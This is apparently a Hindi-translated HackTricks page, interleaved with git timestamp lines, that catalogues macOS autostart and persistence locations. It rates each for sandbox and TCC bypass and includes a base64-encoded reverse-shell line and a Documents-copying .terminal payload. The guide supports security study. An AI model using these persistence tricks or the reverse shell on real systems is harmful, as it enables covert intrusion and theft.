2024-02-07 07:34:51 +00:00
# macOS ऑटो स्टार्ट
2023-06-01 21:09:46 +00:00
2024-07-18 18:53:16 +00:00
{% hint style="success" %}
2024-09-21 18:25:44 +00:00
सीखें और AWS हैकिंग का अभ्यास करें:< img src = "../.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "../.gitbook/assets/arte.png" alt = "" data-size = "line" > \
सीखें और GCP हैकिंग का अभ्यास करें: < img src = "../.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "../.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2023-06-01 21:09:46 +00:00
2024-07-18 18:53:16 +00:00
< details >
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
< summary > HackTricks का समर्थन करें< / summary >
2023-12-31 04:18:31 +00:00
2024-09-21 18:25:44 +00:00
* [**सदस्यता योजनाएँ** ](https://github.com/sponsors/carlospolop ) देखें!
* **हमारे** 💬 [**Discord समूह** ](https://discord.gg/hRep4RUj7f ) या [**टेलीग्राम समूह** ](https://t.me/peass ) में शामिल हों या **हमें** **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )** पर फॉलो करें।**
* **हैकिंग ट्रिक्स साझा करें और** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) और [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) गिटहब रिपोजिटरी में PR सबमिट करें।
2023-06-01 21:09:46 +00:00
< / details >
2024-07-18 18:53:16 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
यह अनुभाग ब्लॉग श्रृंखला [**Beyond the good ol' LaunchAgents** ](https://theevilbit.github.io/beyond/ ) पर आधारित है, जिसका लक्ष्य है **अधिक ऑटोस्टार्ट स्थान** जोड़ना (यदि संभव हो) और यह संकेत देना कि **कौन सी तकनीकें आजकल काम कर रही हैं** नवीनतम macOS (13.4) के संस्करण के साथ और आवश्यक **अनुमतियों** को निर्दिष्ट करना।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
## सैंडबॉक्स बायपास
2023-09-28 20:05:35 +00:00
{% hint style="success" %}
2024-09-21 18:25:44 +00:00
यहां आप **सैंडबॉक्स बायपास** के लिए उपयोगी स्टार्ट स्थान पा सकते हैं जो आपको **किसी चीज़ को एक फ़ाइल में लिखकर** और एक बहुत **सामान्य** **क्रिया** , एक निर्धारित **समय** या एक **क्रिया जिसे आप आमतौर पर** सैंडबॉक्स के अंदर बिना रूट अनुमतियों की आवश्यकता के कर सकते हैं, द्वारा सरलता से निष्पादित करने की अनुमति देता है।
2023-09-28 20:05:35 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
### Launchd
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स बायपास के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
* **`/Library/LaunchAgents`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: रिबूट
2023-12-31 04:18:31 +00:00
* रूट आवश्यक
2023-09-28 15:09:34 +00:00
* **`/Library/LaunchDaemons`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: रिबूट
2023-12-31 04:18:31 +00:00
* रूट आवश्यक
2023-09-28 15:09:34 +00:00
* **`/System/Library/LaunchAgents`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: रिबूट
2023-12-31 04:18:31 +00:00
* रूट आवश्यक
2023-09-28 15:09:34 +00:00
* **`/System/Library/LaunchDaemons`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: रिबूट
2023-12-31 04:18:31 +00:00
* रूट आवश्यक
2023-09-28 15:09:34 +00:00
* **`~/Library/LaunchAgents`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: फिर से लॉगिन
2023-09-28 15:09:34 +00:00
* **`~/Library/LaunchDemons`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: फिर से लॉगिन
2023-09-28 15:09:34 +00:00
2024-07-17 18:49:06 +00:00
{% hint style="success" %}
2024-09-21 18:25:44 +00:00
एक दिलचस्प तथ्य के रूप में, ** `launchd` ** में Mach-o अनुभाग `__Text.__config` में एक एम्बेडेड प्रॉपर्टी लिस्ट है जिसमें अन्य प्रसिद्ध सेवाएँ शामिल हैं जिन्हें launchd को शुरू करना चाहिए। इसके अलावा, इन सेवाओं में `RequireSuccess` , `RequireRun` और `RebootOnSuccess` हो सकते हैं जिसका अर्थ है कि उन्हें चलाना और सफलतापूर्वक पूरा करना चाहिए।
2024-07-17 18:49:06 +00:00
2024-09-21 18:25:44 +00:00
बेशक, इसे कोड साइनिंग के कारण संशोधित नहीं किया जा सकता है।
2024-07-17 18:49:06 +00:00
{% endhint %}
2023-11-06 08:38:02 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
**`launchd`** OX S कर्नेल द्वारा स्टार्टअप पर निष्पादित होने वाली **पहली** **प्रक्रिया** है और शटडाउन पर समाप्त होने वाली अंतिम प्रक्रिया है। इसे हमेशा **PID 1** होना चाहिए। यह प्रक्रिया **ASEP** **plist** में निर्दिष्ट कॉन्फ़िगरेशन को **पढ़ेगी और निष्पादित करेगी** :
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
* `/Library/LaunchAgents` : व्यवस्थापक द्वारा स्थापित प्रति-उपयोगकर्ता एजेंट
* `/Library/LaunchDaemons` : व्यवस्थापक द्वारा स्थापित प्रणाली-व्यापी डेमन
* `/System/Library/LaunchAgents` : Apple द्वारा प्रदान किए गए प्रति-उपयोगकर्ता एजेंट।
* `/System/Library/LaunchDaemons` : Apple द्वारा प्रदान किए गए प्रणाली-व्यापी डेमन।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
जब एक उपयोगकर्ता लॉग इन करता है, तो `/Users/$USER/Library/LaunchAgents` और `/Users/$USER/Library/LaunchDemons` में स्थित plist को **लॉग इन उपयोगकर्ताओं की अनुमतियों** के साथ शुरू किया जाता है।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
एजेंट और डेमन के बीच **मुख्य अंतर यह है कि एजेंट तब लोड होते हैं जब उपयोगकर्ता लॉग इन करता है और डेमन सिस्टम स्टार्टअप पर लोड होते हैं** (क्योंकि ऐसे सेवाएँ हैं जैसे ssh जिन्हें किसी भी उपयोगकर्ता के सिस्टम में प्रवेश करने से पहले निष्पादित करने की आवश्यकता होती है)। इसके अलावा, एजेंट GUI का उपयोग कर सकते हैं जबकि डेमन को बैकग्राउंड में चलाना आवश्यक है।
2023-06-01 21:09:46 +00:00
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
< plist version = "1.0" >
< dict >
2023-11-06 08:38:02 +00:00
< key > Label< / key >
< string > com.apple.someidentifier< / string >
< key > ProgramArguments< / key >
< array >
< string > bash -c 'touch /tmp/launched'< / string > <!-- Prog to execute -->
< / array >
< key > RunAtLoad< / key > < true / > <!-- Execute at system startup -->
< key > StartInterval< / key >
< integer > 800< / integer > <!-- Execute each 800s -->
< key > KeepAlive< / key >
< dict >
< key > SuccessfulExit< / key > < / false > <!-- Re - execute if exit unsuccessful -->
<!-- If previous is true, then re - execute in successful exit -->
< / dict >
2023-06-01 21:09:46 +00:00
< / dict >
< / plist >
```
2024-09-21 18:25:44 +00:00
कुछ मामलों में **एजेंट को उपयोगकर्ता लॉगिन करने से पहले निष्पादित करने की आवश्यकता होती है** , इन्हें **PreLoginAgents** कहा जाता है। उदाहरण के लिए, यह लॉगिन पर सहायक तकनीक प्रदान करने के लिए उपयोगी है। इन्हें `/Library/LaunchAgents` में भी पाया जा सकता है (उदाहरण के लिए [**यहाँ** ](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents ) देखें)।
2023-06-01 21:09:46 +00:00
2023-09-28 15:09:34 +00:00
{% hint style="info" %}
2024-09-21 18:25:44 +00:00
नए डेमन्स या एजेंट कॉन्फ़िग फ़ाइलें **अगली रिबूट के बाद या** `launchctl load <target.plist>` का उपयोग करके **लोड की जाएंगी** । यह **बिना उस एक्सटेंशन के .plist फ़ाइलों को लोड करना भी संभव है** `launchctl -F <file>` के साथ (हालांकि वे plist फ़ाइलें रिबूट के बाद स्वचालित रूप से लोड नहीं होंगी)।\
इसे **अनलोड** करना भी संभव है `launchctl unload <target.plist>` के साथ (इसके द्वारा इंगित प्रक्रिया समाप्त कर दी जाएगी),
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
यह **सुनिश्चित करने के लिए** कि कोई **भी चीज़** (जैसे ओवरराइड) **एजेंट** या **डेमन** **के चलने** को **रोक** नहीं रही है, चलाएँ: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`
2023-09-28 15:09:34 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
वर्तमान उपयोगकर्ता द्वारा लोड किए गए सभी एजेंटों और डेमन्स की सूची बनाएं:
2023-06-01 21:09:46 +00:00
```bash
launchctl list
```
2023-11-02 16:52:21 +00:00
{% hint style="warning" %}
2024-09-21 18:25:44 +00:00
यदि एक plist एक उपयोगकर्ता द्वारा स्वामित्व में है, भले ही यह एक डेमन सिस्टम वाइड फ़ोल्डर में हो, तो **कार्य उपयोगकर्ता के रूप में निष्पादित होगा** और न कि रूट के रूप में। यह कुछ विशेषाधिकार वृद्धि हमलों को रोक सकता है।
2023-11-02 16:52:21 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
#### launchd के बारे में अधिक जानकारी
2024-07-17 18:49:06 +00:00
2024-09-21 18:25:44 +00:00
**`launchd`** पहला उपयोगकर्ता मोड प्रक्रिया है जो **kernel** से शुरू होती है। प्रक्रिया प्रारंभ **सफल** होना चाहिए और यह **बंद या क्रैश** नहीं हो सकती। यह कुछ **किलिंग सिग्नल्स** के खिलाफ भी **संरक्षित** है।
2024-07-17 18:49:06 +00:00
2024-09-21 18:25:44 +00:00
`launchd` द्वारा की जाने वाली पहली चीजों में से एक सभी **डेमन्स** को **शुरू करना** है जैसे:
2024-07-17 18:49:06 +00:00
2024-09-21 18:25:44 +00:00
* **टाइमर डेमन्स** जो निष्पादित होने के लिए समय पर आधारित हैं:
* atd (`com.apple.atrun.plist`): इसका `StartInterval` 30 मिनट है
* crond (`com.apple.systemstats.daily.plist`): इसका `StartCalendarInterval` 00:15 पर शुरू होता है
* **नेटवर्क डेमन्स** जैसे:
* `org.cups.cups-lpd` : TCP में सुनता है (`SockType: stream`) के साथ `SockServiceName: printer`
* SockServiceName या तो एक पोर्ट या `/etc/services` से एक सेवा होनी चाहिए
* `com.apple.xscertd.plist` : TCP में पोर्ट 1640 पर सुनता है
* **पाथ डेमन्स** जो एक निर्दिष्ट पाथ के बदलने पर निष्पादित होते हैं:
* `com.apple.postfix.master` : पाथ `/etc/postfix/aliases` की जांच कर रहा है
* **IOKit सूचनाएँ डेमन्स**:
2024-07-17 18:49:06 +00:00
* `com.apple.xartstorageremoted` : `"com.apple.iokit.matching" => { "com.apple.device-attach" => { "IOMatchLaunchStream" => 1 ...`
* **Mach पोर्ट:**
2024-09-21 18:25:44 +00:00
* `com.apple.xscertd-helper.plist` : यह `MachServices` प्रविष्टि में नाम `com.apple.xscertd.helper` को इंगित कर रहा है
2024-07-17 18:49:06 +00:00
* **UserEventAgent:**
2024-09-21 18:25:44 +00:00
* यह पिछले वाले से अलग है। यह launchd को विशिष्ट घटना के जवाब में ऐप्स उत्पन्न करने के लिए बनाता है। हालाँकि, इस मामले में, शामिल मुख्य बाइनरी `launchd` नहीं है बल्कि `/usr/libexec/UserEventAgent` है। यह SIP प्रतिबंधित फ़ोल्डर /System/Library/UserEventPlugins/ से प्लगइन्स लोड करता है जहाँ प्रत्येक प्लगइन अपने प्रारंभकर्ता को `XPCEventModuleInitializer` कुंजी में या पुराने प्लगइन्स के मामले में, इसके `Info.plist` के कुंजी `FB86416D-6164-2070-726F-70735C216EC0` के तहत `CFPluginFactories` शब्दकोश में इंगित करता है।
2024-07-17 18:49:06 +00:00
2024-09-21 18:25:44 +00:00
### शेल स्टार्टअप फ़ाइलें
2023-12-26 03:49:11 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/ ](https://theevilbit.github.io/beyond/beyond\_0001/ )\
Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/ ](https://theevilbit.github.io/beyond/beyond\_0018/ )
2023-12-26 03:49:11 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-07-18 18:53:16 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* लेकिन आपको एक ऐप ढूंढने की आवश्यकता है जिसमें एक TCC बायपास हो जो एक शेल निष्पादित करता है जो इन फ़ाइलों को लोड करता है
2023-12-26 03:49:11 +00:00
#### स्थान
2023-12-30 01:27:36 +00:00
* **`~/.zshrc`, `~/.zlogin` , `~/.zshenv.zwc` **, ** `~/.zshenv` , `~/.zprofile` **
2023-12-26 03:49:11 +00:00
* **ट्रिगर**: zsh के साथ एक टर्मिनल खोलें
* **`/etc/zshenv`, `/etc/zprofile` , `/etc/zshrc` , `/etc/zlogin` **
* **ट्रिगर**: zsh के साथ एक टर्मिनल खोलें
2024-02-07 07:34:51 +00:00
* रूट की आवश्यकता है
2023-12-26 03:49:11 +00:00
* **`~/.zlogout`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: zsh के साथ एक टर्मिनल से बाहर निकलें
2023-12-26 03:49:11 +00:00
* **`/etc/zlogout`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: zsh के साथ एक टर्मिनल से बाहर निकलें
2024-02-07 07:34:51 +00:00
* रूट की आवश्यकता है
2024-09-21 18:25:44 +00:00
* संभावित रूप से अधिक में: ** `man zsh` **
2023-12-26 03:49:11 +00:00
* **`~/.bashrc`**
2024-07-18 18:53:16 +00:00
* **ट्रिगर**: bash के साथ एक टर्मिनल खोलें
2023-12-26 03:49:11 +00:00
* `/etc/profile` (काम नहीं किया)
* `~/.profile` (काम नहीं किया)
* `~/.xinitrc` , `~/.xserverrc` , `/opt/X11/etc/X11/xinit/xinitrc.d/`
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: xterm के साथ ट्रिगर होने की उम्मीद थी, लेकिन यह **स्थापित नहीं है** और यहां तक कि स्थापित होने के बाद भी यह त्रुटि फेंकी जाती है: xterm: `DISPLAY is not set`
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
जब `zsh` या `bash` जैसे शेल वातावरण को प्रारंभ किया जाता है, तो **कुछ स्टार्टअप फ़ाइलें चलती हैं** । macOS वर्तमान में `/bin/zsh` को डिफ़ॉल्ट शेल के रूप में उपयोग करता है। यह शेल स्वचालित रूप से तब पहुंचा जाता है जब टर्मिनल एप्लिकेशन लॉन्च किया जाता है या जब किसी डिवाइस को SSH के माध्यम से एक्सेस किया जाता है। जबकि `bash` और `sh` भी macOS में मौजूद हैं, उन्हें उपयोग करने के लिए स्पष्ट रूप से बुलाया जाना चाहिए।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
zsh का मैन पृष्ठ, जिसे हम ** `man zsh` ** के साथ पढ़ सकते हैं, स्टार्टअप फ़ाइलों का एक लंबा विवरण है।
2023-09-28 15:09:34 +00:00
```bash
# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc
```
2024-09-21 18:25:44 +00:00
### पुनः खोली गई एप्लिकेशन
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
संकेतित शोषण को कॉन्फ़िगर करना और लॉग आउट और लॉग इन करना या यहां तक कि रिबूट करना मेरे लिए ऐप को निष्पादित करने के लिए काम नहीं किया। (ऐप निष्पादित नहीं हो रहा था, शायद इसे इन क्रियाओं के प्रदर्शन के समय चलना चाहिए)
2023-09-28 20:05:35 +00:00
{% endhint %}
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
**लेख**: [https://theevilbit.github.io/beyond/beyond\_0021/ ](https://theevilbit.github.io/beyond/beyond\_0021/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: पुनः खोलने वाली एप्लिकेशन को पुनः प्रारंभ करें
2023-09-28 15:09:34 +00:00
2024-07-18 18:53:16 +00:00
#### विवरण और शोषण
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
पुनः खोलने के लिए सभी एप्लिकेशन plist `~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist` के अंदर हैं
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
तो, पुनः खोलने वाली एप्लिकेशन को अपने स्वयं के एप्लिकेशन को लॉन्च करने के लिए, आपको बस **अपना ऐप सूची में जोड़ना** है।
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
UUID को उस निर्देशिका को सूचीबद्ध करके या `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` के साथ पाया जा सकता है।
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
पुनः खोली जाने वाली एप्लिकेशनों की जांच करने के लिए आप कर सकते हैं:
2023-09-28 20:05:35 +00:00
```bash
defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist
2023-09-28 15:09:34 +00:00
```
2024-09-21 18:25:44 +00:00
इस सूची में **एक एप्लिकेशन जोड़ने के लिए** आप उपयोग कर सकते हैं:
2023-09-28 15:09:34 +00:00
```bash
2023-09-28 20:05:35 +00:00
# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
2023-11-06 08:38:02 +00:00
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist
2023-09-28 15:09:34 +00:00
```
2024-09-21 18:25:44 +00:00
### Terminal Preferences
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* Sandbox को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
* टर्मिनल का उपयोग करने के लिए उपयोगकर्ता के FDA अनुमतियाँ
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-10-01 18:04:16 +00:00
* **`~/Library/Preferences/com.apple.Terminal.plist`**
2024-09-21 18:25:44 +00:00
* **Trigger**: टर्मिनल खोलें
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploitation
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
**`~/Library/Preferences`** में उपयोगकर्ता की एप्लिकेशन की प्राथमिकताएँ संग्रहीत होती हैं। इनमें से कुछ प्राथमिकताएँ **अन्य एप्लिकेशन/स्क्रिप्ट्स को निष्पादित करने** के लिए एक कॉन्फ़िगरेशन रख सकती हैं।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
उदाहरण के लिए, टर्मिनल स्टार्टअप में एक कमांड निष्पादित कर सकता है:
2023-09-28 15:09:34 +00:00
2024-07-17 18:49:06 +00:00
< figure > < img src = "../.gitbook/assets/image (1148).png" alt = "" width = "495" > < figcaption > < / figcaption > < / figure >
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
यह कॉन्फ़िगरेशन फ़ाइल ** `~/Library/Preferences/com.apple.Terminal.plist` ** में इस तरह से परिलक्षित होता है:
2023-09-28 15:09:34 +00:00
```bash
2023-09-28 20:05:35 +00:00
[...]
"Window Settings" => {
2023-11-06 08:38:02 +00:00
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
2023-09-28 20:05:35 +00:00
[...]
2023-09-28 15:09:34 +00:00
```
2024-09-21 18:25:44 +00:00
तो, यदि सिस्टम में टर्मिनल की प्राथमिकताओं का plist ओवरराइट किया जा सकता है, तो ** `open` ** कार्यक्षमता का उपयोग **टर्मिनल खोलने और उस कमांड को निष्पादित करने के लिए किया जा सकता है** ।
आप इसे cli से जोड़ सकते हैं:
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
{% code overflow="wrap" %}
2023-09-28 15:09:34 +00:00
```bash
# Add
2023-09-28 20:05:35 +00:00
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
2023-09-28 15:09:34 +00:00
# Remove
2023-09-28 20:05:35 +00:00
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
2023-09-28 15:09:34 +00:00
```
2024-02-07 07:34:51 +00:00
{% endcode %}
### टर्मिनल स्क्रिप्ट / अन्य फ़ाइल एक्सटेंशन
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-07-17 18:49:06 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* टर्मिनल का उपयोग उपयोगकर्ता के FDA अनुमतियों को प्राप्त करने के लिए करें
2023-10-01 18:04:16 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-10-01 18:04:16 +00:00
2023-11-06 08:38:02 +00:00
* **कहीं भी**
* **ट्रिगर**: टर्मिनल खोलें
2023-10-01 18:04:16 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण और शोषण
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
यदि आप एक [**`.terminal`** स्क्रिप्ट ](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx ) बनाते हैं और इसे खोलते हैं, तो **टर्मिनल एप्लिकेशन** स्वचालित रूप से वहां निर्दिष्ट कमांड को निष्पादित करने के लिए सक्रिय हो जाएगा। यदि टर्मिनल ऐप के पास कुछ विशेष विशेषाधिकार हैं (जैसे TCC), तो आपका कमांड उन विशेष विशेषाधिकारों के साथ चलाया जाएगा।
2023-10-01 18:04:16 +00:00
2024-09-21 18:25:44 +00:00
इसे आजमाएं:
2023-10-01 18:04:16 +00:00
```bash
# Prepare the payload
cat > /tmp/test.terminal < < EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
2023-11-06 08:38:02 +00:00
< key > CommandString< / key >
< string > mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;< / string >
< key > ProfileCurrentVersion< / key >
< real > 2.0600000000000001< / real >
< key > RunCommandAsShell< / key >
< false / >
< key > name< / key >
< string > exploit< / string >
< key > type< / key >
< string > Window Settings< / string >
2023-10-01 18:04:16 +00:00
< / dict >
< / plist >
EOF
# Trigger it
open /tmp/test.terminal
# Use something like the following for a reverse shell:
< string > echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;< / string >
```
2024-09-21 18:25:44 +00:00
आप ** `.command` **, ** `.tool` ** एक्सटेंशन का उपयोग कर सकते हैं, जिनमें नियमित शेल स्क्रिप्ट सामग्री होती है और इन्हें भी टर्मिनल द्वारा खोला जाएगा।
{% hint style="danger" %}
यदि टर्मिनल के पास **पूर्ण डिस्क एक्सेस** है, तो यह उस क्रिया को पूरा करने में सक्षम होगा (ध्यान दें कि निष्पादित कमांड एक टर्मिनल विंडो में दिखाई देगा)।
{% endhint %}
2024-07-17 18:49:06 +00:00
### ऑडियो प्लगइन्स
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0013/ ](https://theevilbit.github.io/beyond/beyond\_0013/ )\
Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882 ](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882 )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-07-17 18:49:06 +00:00
* TCC बायपास: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-12-30 01:27:36 +00:00
* आपको कुछ अतिरिक्त TCC एक्सेस मिल सकता है
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 20:05:35 +00:00
* **`/Library/Audio/Plug-Ins/HAL`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
2024-03-17 18:36:12 +00:00
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
2023-09-28 20:05:35 +00:00
* **`/Library/Audio/Plug-ins/Components`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
2024-03-17 18:36:12 +00:00
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
2023-09-28 20:05:35 +00:00
* **`~/Library/Audio/Plug-ins/Components`**
2024-03-17 18:36:12 +00:00
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
2023-09-28 20:05:35 +00:00
* **`/System/Library/Components`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
2024-03-17 18:36:12 +00:00
* **ट्रिगर**: coreaudiod या कंप्यूटर को पुनरारंभ करें
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
पिछले लेखों के अनुसार, **कुछ ऑडियो प्लगइन्स को संकलित करना** और उन्हें लोड करना संभव है।
2023-09-28 20:05:35 +00:00
2024-07-17 18:49:06 +00:00
### क्विकलुक प्लगइन्स
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/ ](https://theevilbit.github.io/beyond/beyond\_0028/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-07-17 18:49:06 +00:00
* TCC बायपास: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-12-30 01:27:36 +00:00
* आपको कुछ अतिरिक्त TCC एक्सेस मिल सकता है
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* `/System/Library/QuickLook`
* `/Library/QuickLook`
* `~/Library/QuickLook`
* `/Applications/AppNameHere/Contents/Library/QuickLook/`
* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
क्विकलुक प्लगइन्स को तब निष्पादित किया जा सकता है जब आप **एक फ़ाइल का पूर्वावलोकन ट्रिगर करते हैं** (फाइंडर में फ़ाइल का चयन करके स्पेस बार दबाएं) और एक **प्लगइन जो उस फ़ाइल प्रकार का समर्थन करता है** स्थापित है।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
यह संभव है कि आप अपना खुद का क्विकलुक प्लगइन संकलित करें, इसे पिछले स्थानों में से एक में रखें ताकि इसे लोड किया जा सके और फिर एक समर्थित फ़ाइल पर जाएं और इसे ट्रिगर करने के लिए स्पेस दबाएं।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
### ~~लॉगिन/लॉगआउट हुक~~
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
